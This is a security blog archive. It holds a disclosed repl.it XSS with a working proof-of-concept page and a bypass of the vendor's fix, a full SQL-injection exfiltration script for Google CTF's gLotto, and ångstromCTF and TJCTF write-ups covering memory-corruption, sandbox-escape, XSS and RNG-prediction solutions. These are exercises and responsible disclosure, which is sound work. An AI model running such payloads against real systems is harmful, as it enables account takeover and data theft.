Repl.it XSS

I recently found a rather interesting, non-traditional XSS vulnerability in repl.it. I was inspired to try this after reading a writeup for Pastetastic from Google CTF 2019, which showed off some really cool cross-origin stuff with iframes.

In case you’re not familiar with repl.it, it’s basically an online IDE with tons of features, including website hosting. Each program you make runs in its own environment called a “repl” (it’s a lot more than just a read-eval-print loop).

While messing around with how different features worked, I discovered that repls for static sites (HTML, CSS, JS) were previewed in a few nested iframes. Specifically, the site preview consisted of an iframe of https://replbox.repl.it/public/secure/, which contained a blank iframe manipulated by its parent, which was modified to contain an iframe pointing to the URL where the static files are hosted:

https://replbox.repl.it/data/web_hosting_1/<username>/<repl_name>/

I’m actually going to take a little detour and look at something interesting with the sandboxing of that iframe:

sandbox="allow-forms allow-pointer-lock allow-popups allow-same-origin allow-scripts allow-modals"

If this was done correctly, it would prevent the iframe containing user content from messing with the top window’s location since the allow-top-navigation option is not set. However, the allow-same-origin attribute means it is not sandboxed from accessing windows that are also on replbox.repl.it, and it just so happens the parent two levels up (the ironically named /public/secure page) is both on the same origin and not sandboxed. This means the location of the top window, repl.it, can be modified with something like:

window.parent.parent.eval("top.location.href = 'https://kmh.zone'")

An arbitrary redirect isn’t a particulary high severity vulnerability, but it obviously goes against the intent of the authors of the code, and shows that cross-origin frame stuff is very weird.

Now let’s start looking at the actual XSS vulnerability. The /public/secure page imports a script, runner.js. After some variable renaming and refactoring, the important part of the code looks like this:

var listeners = { load: s, evaljs: a, html: i };
var secret;
window.addEventListener("message", function(event) {
  var req = JSON.parse(event.data);
  if (req.secret) {
    if (secret || "handshake" !== req.type) {
      if (req.secret !== secret) return;
      if (!listeners[req.type])
      	throw Error("No listeners for event:" + req.type);
      listeners[req.type](req.data);
    } else secret = req.secret;
  }
})

There’s a pretty glaring issue here — the message handler doesn’t check the origin. This means we can stick this in an iframe in our own site and send any messages we want, including evaljs (which, per it’s name, evaluates JavaScript).

So this gives us full code execution on replbox.repl.it. The thing is that this is kind of useless; there is a session cookie on that domain, but I couldn’t see anything it authenticated for. I messed around for a while trying to find stuff like a path I could host a service worker on, but all the user controlled content was under directories based on username and repl name.

As I continued to mess around, I started to notice the similarities between the API on repl.it and replbox.repl.it: they both had /data routes, they both had /public routes, and the 404 pages were the same. Eventually I realized that if I set my session cookie to be the same on replbox.repl.it as repl.it, I could access the authenticated API routes. Then I had an idea — what if there was /public/secure/ on repl.it? And lo and behold, there it was! I had arbitrary JavaScript execution on the main domain. I quickly wrote up a proof of concept that created a repl as the currently signed in user:

<iframe style="position:absolute;left:-100000px;" id="repl" src="https://repl.it/public/secure"></iframe>
<script>
function createRepl(){
  var xhr = new XMLHttpRequest();
  xhr.open("POST", 'https://repl.it/data/repls/new');
  xhr.setRequestHeader("Content-Type", "application/json");
  xhr.send(JSON.stringify({language: "python3", title: "kmh was here " + Math.floor(Math.random()*1000000), folderId: "", isPrivate: false, description: ""}));
}
setTimeout(function() {
  repl.contentWindow.postMessage(JSON.stringify({secret: "asdf", type: "handshake"}), "*");
    setTimeout(function() {
      repl.contentWindow.postMessage(JSON.stringify({secret: "asdf", type: "load"}), "*")
        setTimeout(function() {
          repl.contentWindow.postMessage(JSON.stringify({secret: "asdf", type: "evaljs", data: createRepl.toString()+";createRepl()"}), "*")
        }, 200)
    }, 200);
}, 200);
</script>

I contacted the repl.it team on Discord, and after waiting a bit, I got a reply and it was forwarded over to the engineering team. Now, according to their security page, they “work with you to fix the issue and then we will credit you on our blog.” After the initial report, they gave me a year-long free “hacker” plan, and I didn’t hear from them again.

I noticed a bit later that they pushed a “fix” to the issue by redirecting from

https://repl.it/public/secure/

to

https://replbox.repl.it/public/secure/

However, in my toolkit of random things that sometimes work, I had a trick that was the intended solution for a problem I wrote for ångstromCTF 2019: there are often inconsistencies in how having multiple slashes in a URL is handled. Some web servers collapse them, some don’t.

In this case, it seems like however they are matching the redirect does not collapse multiple slashes, but the way they are serving the files does. This means that you can go to https://repl.it/public//secure/ and still get full code execution on the repl.it domain. Since they never contacted me to verify whether it was fixed, I had no way or reason to let them know. Oh well.

PS: If you’re currently logged in to repl.it, check out your repls ;)

Update: repl.it has fixed the redirect bypass and is working on a couple other XSS and CSRF issues I reported.

Google CTF 2019

I played Google CTF as a part of the team pearl this past weekend. We did okay, placing 50th (obviously not a high school CTF). I solved one web challenge that I really liked — gLotto.

gLotto

22 solves, 288 points

Are you lucky?

https://glotto.web.ctfcompetition.com/

Analysis

The link goes to a “lottery” website, with tables of past winning tickets and an option to check your ticket. At the bottom of the page, there is a link to show the source.

We can see that the flag is given if you submit the winning ticket:

if ($_POST['code'] === $win)
{
    die("You won! $flag");
} else {
    sleep(5);
    die("You didn't win :(<br>The winning ticket was $win");
}

Additionally, a new winning ticket is randomly generated on every request to the home page, and the winning ticket is unset on checking a ticket, preventing you from just submitting the winning ticket without visiting the home page again.

The application also lets you sort each table by a key in a query parameter:

for ($i = 0; $i < count($tables); $i++)
{
    $order = isset($_GET["order{$i}"]) ? $_GET["order{$i}"] : '';
    if (stripos($order, 'benchmark') !== false) die;
    ${"result$i"} = $db->query("SELECT * FROM {$tables[$i]} " . ($order != '' ? "ORDER BY `".$db->escape_string($order)."`" : ""));
    if (!${"result$i"}) die;
}

The documentation for mysql::escape_string lists the characters encoded:

Characters encoded are NUL (ASCII 0), \n, \r, \, ‘, “, and Control-Z.

Notice that backticks are not on this list, so "ORDER BY `".$db->escape_string($order)."`" is vulnerable to SQL injection. Here is a very basic proof that this works:

https://glotto.web.ctfcompetition.com/?order0=winner`%20--%20

This URL sorts the March table by the winner column, since it results in the following query:

SELECT * FROM march ORDER BY `winner` -- `

The -- comments out the extra backtick to prevent a syntax error.

At this point, it’s also important to note that the winning ticket is assigned to an SQL variable that is never used again:

$db->query("SET @lotto = '$winner'");

Interesting…

So, what can we do with the SQL injection? Well, the answer turns out to be “not much.” The MySQL documentation shows the valid syntax for a SELECT statement:

SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr [, select_expr ...]
    [FROM table_references
      [PARTITION partition_list]
    [WHERE where_condition]
    [GROUP BY {col_name | expr | position}, ... [WITH ROLLUP]]
    [HAVING where_condition]
    [WINDOW window_name AS (window_spec)
        [, window_name AS (window_spec)] ...]
    [ORDER BY {col_name | expr | position}
      [ASC | DESC], ... [WITH ROLLUP]]
    [LIMIT {[offset,] row_count | row_count OFFSET offset}]
    [INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        export_options
      | INTO DUMPFILE 'file_name'
      | INTO var_name [, var_name]]
    [FOR {UPDATE | SHARE} [OF tbl_name [, tbl_name] ...] [NOWAIT | SKIP LOCKED] 
      | LOCK IN SHARE MODE]]

Our injection is after ORDER BY, so the only fields we control are ORDER BY, LIMIT, INTO, and FOR. INTO and FOR are both pretty much useless for conveying information. LIMIT cannot be an expression, so it can’t be used for sending data. That leaves the ORDER BY clause.

Since we have to specify a valid column for the first ORDER BY, and each column has unique values, it seems like we won’t be able to control the ordering. However, we can add on to the expression to make it always return the same value and force it to use the secondary sort column. I chose to use IS NOT NULL. With this, we can sort by an arbitrary value. Let’s try just sorting randomly:

https://glotto.web.ctfcompetition.com/?order0=winner`%20IS%20NOT%20NULL,%20RAND()%20--%20

This gives the following query:

SELECT * FROM march ORDER BY `winner` IS NOT NULL, RAND() -- `

As expected, the March table is ordered differently each time we visit the page.

Exploitation

So we have complete control over the ordering. Is this enough to transmit the entire winning ticket? Let’s look at the gen_winner function:

function gen_winner($count, $charset='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ')
{
    $len = strlen($charset);
    $rand = openssl_random_pseudo_bytes($count);
    $secret = '';

    for ($i = 0; $i < $count; $i++)
    {
        $secret .= $charset[ord($rand[$i]) % $len];
    }
    return $secret;
}

And how it is called:

$winner = gen_winner(12);

This is essentially a 12 digit base36 number, so there are 36**12 possible tickets:

>>> 36**12
4738381338321616896

We are able to sort 4 different tables, of lengths 9, 8, 7, and 4. If we make the meaning of the ordering of each table depend on the ordering of the previous tables, we can calculate the number of possible “messages”:

>>> fac(9)*fac(8)*fac(7)*fac(4)
1769804660736000

This means we can narrow it down to about 2,677 possible tickets:

>>> 4738381338321616896/1769804660736000
2677.3470787172014

Since there is a sleep(5) when checking a ticket, each check takes a little over 5 seconds. If we parallelize our solution script, it is definitely possible to brute force ~2.7k in a reasonable amount of time (i.e. less than an hour).

Encoding

We need to figure out how to encode information in the tables. A table of size n has n! permutations, so it can encode n! numbers based on ordering.

Let the default ordering of the table be order[0, 1, 2, ... n]. In order to encode a number x within the interval [0, n!), first divide the interval into n subintervals: [0, (n-1)!), [(n-1)!, 2*(n-1)!), ..., [(n-1)*(n-1)!, n*(n-1)!). If x lies within interval i, the new ordering begins with order[i]. Repeat within that interval, this time dividing into n-1 subintervals. Of course, order[i] must be removed since it was already used; n-1 elements remain.

Python implementations of encoding and decoding are given below:

def encode(x, n):
  rows = list(range(n))
  order = []
  for i in range(n-1, -1, -1):
    order.append(rows.pop(x//fac(i)))
    x %= fac(i)
  return tuple(order)

def decode(order, n):
  order = list(order)
  rows = list(range(n))
  x = 0
  for i in range(n-1, -1, -1):
    j = rows.index(order.pop(0))
    x += j*fac(i)
    rows.pop(j)
  return x

The encoding function needs to be implemented in SQL. This seems hard at first since it uses a mutable array and pops indices from it, and we can only use simple SQL expressions. While it may be possible to generate a bunch of CASE statements that give a single expression for transposing each position, it would also be incredibly long, and the web server has limits on how long the query string can be (which we encounter a little bit later).

However, a couple observations make this conversion a little bit easier:

  1. Subqueries can be used to make “variables”
  2. MySQL has support for a JSON data type

To do incremental calculations that reuse previous ones, we can stack subqueries like so:

(SELECT c+1 as d FROM (SELECT b+1 as c FROM (SELECT a+1 as b FROM...

The important thing is that this allows us to reuse a previous calculation in multiple future calculations without retyping the entire expression. Another thing to note here is that we don’t have any variables/state, just composition of functions (subqueries). This might remind you a little bit of lambda calculus.

In the Python implementation of encode, there are basically three pieces of state: rows, order, and x. rows is the remaining rows that have not been transposed. order is the output of the function (the map for transposition). x is the number to encode, modded by the interval size at each step. MySQL’s JSON type can represent arrays, so that will be used for rows and order.

When sending a request to the server, the table sizes are predetermined, so anything depending on that can be hardcoded into the SQL query. We will implement a Python function that generates an SQL query to reorder a table of size n such that it extracts a number represented by the expression expr. The conditions that represent the original row order will be given in the array m:

def sqlencode(expr, n, m):

The initial state of the encoding can be set with the following subquery (curly braces are used for formatting the string):

SELECT {expr} as s{n}, JSON_ARRAY({','.join(str(i) for i in range(n))}) as r{n}, JSON_ARRAY(0) as o{n}, CONCAT(CHAR(36), CHAR(91), CHAR(65), CHAR(93)) as h) AS t{n}

x is represented by s{n}, rows is represented by r{n}, and order is represented by o{n}. The JSON_ARRAY is initialized with a single element because on my local version of MariaDB, it turned into an empty string otherwise. It is not required against the server. h is a helper string, '$[A]', that allows for a REPLACE to be used instead of reconstructing the entire JSON identifier each time. Without this optimization, the query ends up being too long and the web server rejects it. CONCAT and CHAR are used since single and double quotes are escaped in the PHP before being put in the query.

Subqueries are then added to the outside for each iteration of the loop in the Python implementation. These are of the format:

SELECT h, JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1}, REPLACE(h,CHAR(65), CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i},  MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h, CHAR(65), CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM {subquery}) AS t{i}

h is selected so it can be used in the next query as well. JSON_ARRAY_APPEND is used to add the element at index floor(x/(i!)) of rows to order. CHAR(36) is just $, which signifies the entire JSON array. It needs to be converted to utf8mb4 because JSON_ARRAY_APPEND rejects binary encoding. x is calculated as the previous x mod i!, and rows has the element at index floor(x/(i!)) removed. REPLACE is used to replace the A in $[A] with the proper index.

Now that the output array is calculated, the rows need to be sorted correctly. A CASE statement is constructed based on the array of conditions, m, to order the rows, and a final query is constructed. The full function can be seen below:

def sqlencode(expr, n, m):
  query = f"(SELECT {expr} as s{n},JSON_ARRAY({','.join(str(i)for i in range(n))}) as r{n},JSON_ARRAY(0) as o{n},CONCAT(CHAR(36),CHAR(91),CHAR(65),CHAR(93)) as h) AS t{n}"
  for i in range(n-1, -1, -1):
    query = f"(SELECT h,JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1},REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i}, MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM " + query + f") AS t{i}"
  jsonquery = "JSON_EXTRACT(o0,CONCAT(CHAR(36),CHAR(91),CONVERT({index},char),CHAR(93)))"
  cases = "CASE"
  for i in range(len(m)):
    cases += f" WHEN {m[i]} THEN {jsonquery.format(index=i+1)}"
  cases += " ELSE NULL END"
  query = "(SELECT " + cases + " FROM " + query + ")"
  return query

To decode a number retrieved from the server, we figure out which row was moved where and plug an array of that into the decode function:

def sqldecode(r, n, m):
  s = sorted(list(map(lambda x:(r.index(x), x), m)), key=lambda x:x[0])
  encoded = []
  for t in m:
    encoded.append([i[1] for i in s].index(t))
  encoded = tuple(encoded)
  return decode(encoded, n)

r is the server response, n is the number of rows, and m is an array the of tickets in their original order.

Exfiltration

We can now transmit 4 numbers in the ranges [0,9!), [0,8!), [0,7!), and [0,4!). To get the possibilities for the winning lottery ticket, we convert it to a base36 number and use each table to get a range of possible values.

We want to divide the number so that it fits in the range of the first table, [0,8!). The maximum value is 36**12 - 1 (ZZZZZZZZZZZZ), so we take that and divide it by 8!:

>>> ceil((36**12 - 1)/fac(8))
117519378430596

Our first piece of data we get is which interval of size 117519378430596 the winning ticket lies in. We then take the winning number modulo 117519378430596, and split that into intervals that give indices up to the size of our next table, 9!. This process is repeated for each table until we narrow it down to 2,677 values and guess one of them.

A couple helper functions are defined to construct the queries and URL parameters:

param = lambda q: f"winner` IS NOT NULL, {q} -- "
num = lambda m1,m2,m3,d: f"(MOD(MOD(MOD(CAST(CONV(@lotto, 36, 10) AS UNSIGNED), {m1}),{m2}),{m3}) DIV {d})"

And we make a guess and hopefully get the flag:

rs = requests.session()
r = rs.get(url, params={
    "order0": param(sqlencode(num(36**12, 36**12, 36**12, 117519378430596), 8, march)),
    "order1": param(sqlencode(num(36**12, 36**12, 117519378430596, 323851903), 9, april)),
    "order2": param(sqlencode(num(36**12, 117519378430596, 323851903, 64257), 7, may)),
    "order3": param(sqlencode(num(117519378430596, 323851903, 64257, 2678), 4, june))
})
r1 = sqldecode(r.text, 8, marcht)
r2 = sqldecode(r.text, 9, aprilt)
r3 = sqldecode(r.text, 7, mayt)
r4 = sqldecode(r.text, 4, junet)
guess = 117519378430596*r1 + 323851903*r2 + 64257*r3 + 2678*r4 + 100
r = rs.post(url, data={"code":base36encode(guess).zfill(12)})
if "CTF" in r.text:
    print(r.text)

The full solution script:

from math import factorial as fac

def base36encode(integer):
    chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    
    sign = '-' if integer < 0 else ''
    integer = abs(integer)
    result = ''
    
    while integer > 0:
        integer, remainder = divmod(integer, 36)
        result = chars[remainder]+result

    return sign+result

def encode(x, n):
  rows = list(range(n))
  order = []

  for i in range(n-1, -1, -1):
    order.append(rows.pop(x//fac(i)))
    x %= fac(i)
  return tuple(order)

def decode(order, n):
  order = list(order)
  rows = list(range(n))
  x = 0
  for i in range(n-1, -1, -1):
    j = rows.index(order.pop(0))
    x += j*fac(i)
    rows.pop(j)
  return x

def sqlencode(expr, n, m):
  query = f"(SELECT {expr} as s{n},JSON_ARRAY({','.join(str(i)for i in range(n))}) as r{n},JSON_ARRAY(0) as o{n},CONCAT(CHAR(36),CHAR(91),CHAR(65),CHAR(93)) as h) AS t{n}"
  for i in range(n-1, -1, -1):
    query = f"(SELECT h,JSON_ARRAY_APPEND(o{i+1}, CONVERT(CHAR(36) USING utf8mb4), JSON_EXTRACT(r{i+1},REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char)))) as o{i}, MOD(s{i+1}, {fac(i)}) as s{i}, JSON_REMOVE(r{i+1}, REPLACE(h,CHAR(65),CONVERT(s{i+1} DIV {fac(i)},char))) AS r{i} FROM " + query + f") AS t{i}"
  jsonquery = "JSON_EXTRACT(o0,CONCAT(CHAR(36),CHAR(91),CONVERT({index},char),CHAR(93)))"
  cases = "CASE"
  for i in range(len(m)):
    cases += f" WHEN {m[i]} THEN {jsonquery.format(index=i+1)}"
  cases += " ELSE NULL END"
  query = "(SELECT " + cases + " FROM " + query + ")"
  return query

def sqldecode(r, n, m):
  s = sorted(list(map(lambda x:(r.index(x), x), m)), key=lambda x:x[0])
  encoded = []
  for t in m:
    encoded.append([i[1] for i in s].index(t))
  encoded = tuple(encoded)
  return decode(encoded, n)

march = ["INSTR(winner,CHAR("+str(ord("C"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("1"))+"))=2",
         "INSTR(winner,CHAR("+str(ord("1"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("U"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("Y"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("H"))+"))=3",
         "INSTR(winner,CHAR("+str(ord("D"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("I"))+"))=1"]
marcht = ["CA5G8VIB6UC9", "01VJNN9RHJAC", "1WSNL48OLSAJ", "UN683EI26G56", "YYKCXJKAK3KV", "00HE2T21U15H", "D5VBHEDB9YGF", "I6I8UV5Q64L0"]

april = ["INSTR(winner,CHAR("+str(ord("4"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("7"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("U"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("O"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("2"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("L"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("8"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("B"))+"))=1",
         "INSTR(winner,CHAR("+str(ord("3"))+"))=1"]
aprilt = ["4KYEC00RC5BZ", "7AET1KPGKUG4", "UDT5LEWRSWM9", "OQQRH90KDJH1", "2JTBMJW9HZOO", "L4CY1JMRBEAW", "8DKYRPIO4QUW", "BFWQCWYK9VHJ", "31OSKU57KV49"]

may = ["INSTR(winner,CHAR("+str(ord("3"))+"))=2",
       "INSTR(winner,CHAR("+str(ord("P"))+"))=1",
       "INSTR(winner,CHAR("+str(ord("W"))+"))=2",
       "INSTR(winner,CHAR("+str(ord("M"))+"))=2",
       "INSTR(winner,CHAR("+str(ord("K"))+"))=1",
       "INSTR(winner,CHAR("+str(ord("Z"))+"))=1",
       "INSTR(winner,CHAR("+str(ord("8"))+"))=1"]
mayt = ["O3QZ2P6JNSSA", "PQ8ZW6TI1JH7", "OWGVFW0XPLHE", "OMZRJWA7WWBC", "KRRNDWFFIB08", "ZJR7ANXVBLEF", "8GAB09Z4Q88A"]

june = ["INSTR(winner,CHAR("+str(ord("1"))+"))=1",
        "INSTR(winner,CHAR("+str(ord("Y"))+"))=1",
        "INSTR(winner,CHAR("+str(ord("W"))+"))=1",
        "INSTR(winner,CHAR("+str(ord("G"))+"))=1"]
junet = ["1JJL716ATSCZ", "YELDF36F4TW7", "WXRJP8D4KKJQ", "G0O9L3XPS3IR"]

param = lambda q: f"winner` IS NOT NULL, {q} -- "
num = lambda m1,m2,m3,d: f"(MOD(MOD(MOD(CAST(CONV(@lotto, 36, 10) AS UNSIGNED), {m1}),{m2}),{m3}) DIV {d})"

import requests
url = "https://glotto.web.ctfcompetition.com"

while True:
  rs = requests.session()
  r = rs.get(url, params={
    "order0": param(sqlencode(num(36**12, 36**12, 36**12, 117519378430596), 8, march)),
    "order1": param(sqlencode(num(36**12, 36**12, 117519378430596, 323851903), 9, april)),
    "order2": param(sqlencode(num(36**12, 117519378430596, 323851903, 64257), 7, may)),
    "order3": param(sqlencode(num(117519378430596, 323851903, 64257, 2678), 4, june))
  })
  r1 = sqldecode(r.text, 8, marcht)
  r2 = sqldecode(r.text, 9, aprilt)
  r3 = sqldecode(r.text, 7, mayt)
  r4 = sqldecode(r.text, 4, junet)
  guess = 117519378430596*r1 + 323851903*r2 + 64257*r3 + 2678*r4 + 100
  r = rs.post(url, data={"code":base36encode(guess).zfill(12)})
  if "CTF" in r.text:
    print(r.text)
    break
  win = int(r.text.split(" ")[-1], 36)
  print(guess - win, r.text.split(" ")[-1], base36encode(guess).zfill(12))

And the code used to parallelize it:

import os, sys

for i in range(10):
  os.system("python3 lotto.py &")

while True:
  try:
    pass
  except BaseException:
    os.system("pkill -f lotto.py")
    sys.exit(0)

After running this for a bit, the flag pops out:

CTF{3c2ca0d10a5d4bf44bc716d669e074b2}

ångstromCTF 2019

This was my second year organizing ångstromCTF. Compared to last year, I wrote a lot more challenges and did a lot more work on the platform. Despite some site stability issues, we still ended up with over 1,300 scoring teams. Here are the challenges I wrote (this is going to be a long post):

Aquarium

This challenge is a relatively basic buffer overflow. You have a win function, so you use the unbounded input in gets to overflow the buffer until the return address is overwritten with the address of the win function.

Plenty of tutorials online (and hopefully community created writeups for this challenge) will go into more detail about how to do this.

Pie Shop

This is a partial overwrite challenge. You are unable to control the null byte at the end of your input and you have 4 bits that are random in the bottom 2 bytes, so you have to overwrite the lower 3 bytes of the address and just keep trying until you get lucky and return to the win function.

Returns

This is a format string challenge.

The first step is getting main to loop. The last printf has been changed to puts due to compiler optimizations or something, so the GOT of puts can be overwritten with the address of main and the function will loop. This can be done in a way similar to how this article describes it, although note that since this is 64-bit and the addresses have null bytes, the addresses must go after your format string.

Next you have to leak a libc addresses - this can be done by popping addresses off the stack (with %x or %p) until you get to __libc_start_main_ret. From this and the libc provided, you can calculate the base address and thus the address of any function in libc.

After this, one last write is required to change strcmp to system, and then /bin/sh can be entered as the item and you have shell.

Server

In this challenge you were given a web server written in assembly. After disassembling the binary, you could see there were several syscalls which allowed the program to listen on port 19303 and fork a new process to serve each connection. You could also see there was a buffer overflow when reading in the path, since it just just kept reading until a space.

With this buffer overflow you could modify a syscall and ultimately get RCE.

Weeb Hunting

This was a heap challenge, and I believe there were multiple ways to solve it. Below I’ll describe my solution.

You could get a double free by just using an item twice - the free’d pointer was not cleared, so the check to see if it was an empty slot failed. With this you could create a loop with the fastbins and allocate something that was also on the fastbin list. The fd of this fastbin could be modified to point to a fake fastbin in .bss and that could then be allocated and modified to overwrite a weapon pointer to an address on the global offset table, leaking a libc address when weapon names were printed.

The same attack with a double free could then be used to overwrite __malloc_hook to the win function and get shell.

TI-1337

This challenge gave a highly restrictive Python exec sandbox (no parentheses, no hashtags, no brackets, no imports, etc.). However, it did allow colons and the @ symbol, so classes could be decorated and lambda functions could be made. Using this, you could open the flag file and read it:

x = 111, 112, 101, 110, 40, 39, 102, 108, 97, 103, 46, 116, 120, 116, 39, 41, 46, 114, 101, 97, 100, 40, 41
y = lambda z: x
@print
@eval
@bytes
@y
class z:
	pass

Bugger

The binary was packed with UPX (findable with strings), but the packer said it could not unpack it. This was because the UPX! header was replaced with null bytes, so it had to be added back in. There was also a ptrace antidebugging mechanism. Since it made syscalls directly, you couldn’t LD_PRELOAD a custom ptrace function. It also made two calls to make sure it could ptrace successfully once, but not twice. The easiest way to bypass this was to catch the syscall in GDB and modify the return value. The binary then performed some weird calculations (modified SHA512 with some random stuff) to get the flag. The values could be pulled from within GDB with a breakpoint set in the proper place.

Control You

For this challenge you just had to read source (keyboard shortcut: Control-U) and see what it was comparing your entered flag with.

DOM Validator

This challenge had tons of unintended solutions - I’m sure people will make writeups for those. My intended solution was much simpler. Just change the URL from https://dom.2019.chall.actf.co/posts/asdfasdfsadf.html to https://dom.2019.chall.actf.co/posts//asdfasdfsadf.html and the relative source for DOMValidator.js no longer loads (404). This behavior is due to how express’s static file serving works (double slashes are collapsed).

This XSS is then used to steal the admin’s cookie, which has the flag.

NaaS

This challenge required breaking Python’s random number generator to predict nonces.

My solve script (using randcrack):

from randcrack import RandCrack

rc = RandCrack()

import binascii
import base64
import requests

requests.get('https://naas.2019.chall.actf.co/status')

noncehtml = "<script></script>"*156
nonces = requests.post('https://naas.2019.chall.actf.co/nonceify', data=noncehtml).json()["csp"].strip("script-src 'nonce-").strip(";").split("' 'nonce-")

bits = []

for nonce in nonces:
	h = binascii.hexlify(base64.b64decode(nonce))
	for i in range(0, len(h), 8):
		bits.append(int(h[i:i+8], 16))

for i in range(0, len(bits), 4):
	bits[i], bits[i+1], bits[i+2], bits[i+3] = bits[i+3], bits[i+2], bits[i+1], bits[i]

for b in bits:
	rc.submit(b)

print(str(base64.b64encode(binascii.unhexlify(hex(rc.predict_getrandbits(128))[2:].zfill(32))), encoding="ascii"))
print(str(base64.b64encode(binascii.unhexlify(hex(rc.predict_getrandbits(128))[2:].zfill(32))), encoding="ascii"))

GiantURL

This challenge gave a “URL lengthener” that also had a report link, where the admin would visit the lengthened URL and click on the link to follow the redirect.

You needed to change an admin’s password through a POST request to /admin/changepass. At first it looked like this could be done just with CSRF, but that wouldn’t work because server set cookies to be SameSite: Lax and the cookie was not sent with cross origin POST requests.

Instead, you had to use the ping attribute on the link you sent (since the href attribute wasn’t quoted you could break out of it with a space) and set it to /admin/changepass?password=<some valid password>. Since the PHP used $_REQUEST both GET and POST parameters were used to get the sent password.

After the admin clicked on the link the admin password would be changed and you could log in and get the flag.

TJCTF 2018

I played TJCTF as part of the team pearl, and we solved every challenge, placing second overall. The Abyss was a Python jail challenge worth 160 points — since I really enjoy this type of challenge, I figured it was worth writing up.

The Abyss

You are able to netcat to a server where you get a Python prompt that execs whatever you enter. However, what you can run is heavily filtered and dangerous functions are filtered from builtins.

The biggest restriction is nothing with __, which prevents most Python jail escapes from working. The solution involves creating a code object, and using that to create a function object that you can run to get the flag.

First you have to get constructors for both code and function objects. This can be done through lambda functions: type(lambda: 0) for functions and type((labmda: 0).func_code) for code objects.

The next step is to create a code object. You can look at the arguments for the constructor with help(type((lambda: 0).func_code)). The parameters can easily be matched up with the properties of the func_code property of any function, so you can just copy them from a function you create locally that does what you want.

Since it can be assumed the goal is to get a shell, all you need is the os module (you can use os.system). The os module can be gotten through something like ().__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['os']. Simply create a function that returns that and create a code object with the method described above.

The next step is copying the function properties. Once again, you can do the same thing and just find the properties corresponding to the arguments of the constructor.

During this process you will notice some __ strings, but you can just separate them into single underscores and concatenate so they aren’t noticed. Ultimately, you will get a payload that looks something like:

type(lambda: 0)(type((lambda: 0).func_code)(0, 1, 4, 67, 'g\x00\x00d\x04\x00j\x00\x00j\x01\x00j\x02\x00\x83\x00\x00D]\x1b\x00}\x00\x00|\x00\x00j\x03\x00d\x01\x00k\x02\x00r\x13\x00|\x00\x00^\x02\x00q\x13\x00d\x02\x00\x19j\x04\x00j\x05\x00j\x06\x00d\x03\x00\x19j\x07\x00S', (None, 'catch_warnings', 0, 'linecache', ()), ('_''_class_''_', '_''_base_''_', '_''_subclasses_''_', '_''_name_''_', '_''_re''pr_''_', 'im_func', 'func_globals', 'os'), ('x',), '<stdin>', 'os', 1, ''), {'_''_builtins_''_': globals()['_''_builtins_''_']})().system('cat flag.txt')

ångstromCTF 2018

I helped organize ångstromCTF this past week, and it was a huge success with over 1,500 scoring teams. Here are the challenges I wrote:

Sequel

This was a simple SQL injection challenge. One of many ways to solve it is using ' or 1# as the username. If you don’t know why this works, w3schools has a nice overview.

Weird Message

This challenge gave a single text file, containing a message. From the hint xn--, it could be determined that this was punycode. Punycode can be decoded in Python with:

"<string>".decode("punycode")

When you do this, you find that the part of the message after the last dash has been removed, and the one before it has changed. Since punycode appends a dash each time a string is encoded, you know that this was probably encoded many times. Trying to decode again, however, gives an error because of unicode characters. Upon further inspection, the end of the string now has homoglyphs. Replacing these with the similar ASCII characters, the string can be decoded again. However, since there are about 200 dashes, the string was probably encoded 200 times. Decoding by hand would take a very long time. Luckily, this is not too hard to automate. You can either build up a mapping of homoglyphs to regular characters manually, or use a prebuilt list like I did.

After decoding fully, you get the flag.

File Storer

You are given a link to a (incredibly ugly) website where you can create accounts and upload files. However, if you try a common name like test for a file, it says the file already exists! This means all files are stored in the same place. Going a step further, the files may be stored in the same place as the rest of the website. Trying to access files/index.py (it can be determined it is Flask from the 404 page) gives a special message, so there are protections against reading it, but it is confirmed it is reading from the root directory of the website. Through the hint or just knowledge of common web vulnerabilities, one decides to try to access files/.git, and, luckily enough, it says the directory exists.

However, git can not be downloaded the normal way since there is no directory listing. For this, you can either manually reconstruct git from known files or use a pre-made script to do that. Once you have .git, you can checkout the files and see the source of the website.

Looking at index.py, you see a “beta feature” that uses getattr to get information about a user. The user class has two attributes: username and __password. Accessing username works just fine, but the password does not! Why could this be? This is the fault of name-mangling. If you instead access _user__password for admin, you get the flag.

There were also a few unintended solutions involving accessing various files.

The Best Website

You are provided with a seemingly useless website. Upon further inspection, it is a legitimately useless website. However, in the source of index.html you see a comment directing developers to record their changes in log.txt. Visiting log.txt, you see that a super secret flag was added to the database, and there is a timestamp. This will be important later.

